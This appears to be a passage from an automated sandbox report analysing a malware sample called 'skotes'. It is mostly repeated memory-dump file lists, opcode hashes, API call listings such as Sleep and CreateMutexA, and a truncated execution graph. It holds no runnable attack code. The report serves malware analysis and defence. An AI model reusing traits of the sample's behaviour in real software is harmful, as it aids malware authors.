                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: beba2ce3920122a6169580e8fdafadbad0a3f946a2a9af6bf06300a77523c793
                                                                                                                                                                                                                                                                • Instruction ID: 0da8a274ed525733227d063bdf4ff358a6d64932f995dfd859bd71fb9b5f0ceb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: beba2ce3920122a6169580e8fdafadbad0a3f946a2a9af6bf06300a77523c793
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E72128313442019AEB346769DD9EB7EB3E19FA7700F240816E108972D2DF7E8981C563

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 283 aaa34f-aaa35b 284 aaa35d-aaa36b 283->284 285 aaa371-aaa39a call abd663 283->285 284->285 287 aaa93a 284->287 291 aaa3c8-aaa916 call ab80c0 285->291 292 aaa39c-aaa3a8 285->292 289 aaa953-aaa994 Sleep CreateMutexA 287->289 290 aaa93a call ad6c6a 287->290 298 aaa996-aaa998 289->298 299 aaa9a7-aaa9a8 289->299 290->289 293 aaa3aa-aaa3b8 292->293 294 aaa3be-aaa3c5 call abd663 292->294 293->287 293->294 294->291 298->299 302 aaa99a-aaa9a5 298->302 302->299
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: b153c31d65b48af1261cdd7e6da53a25dfc3e8973f52fa50fc767a3be80407d5
                                                                                                                                                                                                                                                                • Instruction ID: 6768f081d8c9081b40bb6b91542974278a9e6966aa25075e96eb9a9a5570fb94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b153c31d65b48af1261cdd7e6da53a25dfc3e8973f52fa50fc767a3be80407d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E2149327042009BEB189B6CED9D7ADF7E6DFE2310F244219E4089B7D1DB769580C262
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                • Instruction ID: 59331a186c7f007e6ab3cfed68c9a5f719f4b1474f554e7d5868b872744e98c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06B136729042869FDB15CF68C8817EEBBF5EF45360F54416BE956EB342DA348D01CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1418687624-0
                                                                                                                                                                                                                                                                • Opcode ID: 48b3e7714bd372a9a58930d89a43260c0250f4430f44762c41142b4c22ea0cab
                                                                                                                                                                                                                                                                • Instruction ID: 2006138df6e24091bb2f55e6794a36c4ba104da9d5fedeff528f2c740bbb32e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48b3e7714bd372a9a58930d89a43260c0250f4430f44762c41142b4c22ea0cab
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1A1D171A012059FEF21DF64C945BAAB7F8FF16324F048269F815D7282EB35EA14CB91

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:5.3%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                Total number of Nodes:783
                                                                                                                                                                                                                                                                Total number of Limit Nodes:41
                                                                                                                                                                                                                                                                execution_graph 36862 aaa1ae GetFileAttributesA 36865 aaa1be Concurrency::details::SchedulerProxy::Cleanup 36862->36865 36863 aaa935 Concurrency::details::_CancellationTokenState::_RegisterCallback 36866 aaa960 Sleep CreateMutexA 36863->36866 36864 aaa289 Concurrency::details::SchedulerProxy::Cleanup 36873 ab80c0 36864->36873 36865->36863 36865->36864 36870 aaa98e 36866->36870 36868 aaa903 36869 aaa9a7 36870->36869 36886 ad6629 GetPEB GetPEB __purecall 36870->36886 36872 aaa9b0 36874 ab8104 36873->36874 36875 ab80de __InternalCxxFrameHandler 36873->36875 36878 ab8158 36874->36878 36879 ab817d 36874->36879 36884 ab8169 Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 36874->36884 36875->36868 36877 ab81f3 36896 aa2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 36877->36896 36878->36877 36887 abd3e2 36878->36887 36883 abd3e2 Concurrency::details::_RegisterConcRTEventTracing RtlAllocateHeap 36879->36883 36879->36884 36881 ab81f8 36883->36884 36885 ab81d0 Concurrency::details::SchedulerProxy::Cleanup 36884->36885 36895 ab9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36884->36895 36885->36868 36886->36872 36890 abd3e7 Concurrency::details::_RegisterConcRTEventTracing 36887->36890 36889 abd401 36889->36884 36890->36889 36891 aa2480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 36890->36891 36897 ad8be1 36890->36897 36893 abd40d Concurrency::details::_TaskCollection::~_TaskCollection Concurrency::details::ResourceManager::ResourceManager 36891->36893 36901 ad38af RtlAllocateHeap ___std_exception_copy Concurrency::details::ResourceManager::CleanupTopologyInformation 36891->36901 36894 aa24c3 36894->36884 36896->36881 36900 adb04b __dosmaperr Concurrency::details::_RegisterConcRTEventTracing 36897->36900 36898 adb074 RtlAllocateHeap 36899 adb087 __dosmaperr 36898->36899 36898->36900 36899->36890 36900->36898 36900->36899 36901->36894 36902 aaeb4e 36903 aaeb50 GetFileAttributesA 36902->36903 36904 aaeb62 36903->36904 36999 ab7a00 36904->36999 36906 aaed60 37010 aa5c10 36906->37010 36908 aaed68 37017 ab83c0 36908->37017 36910 aaed7d 37025 ab8220 36910->37025 36912 aaed8c GetFileAttributesA 36915 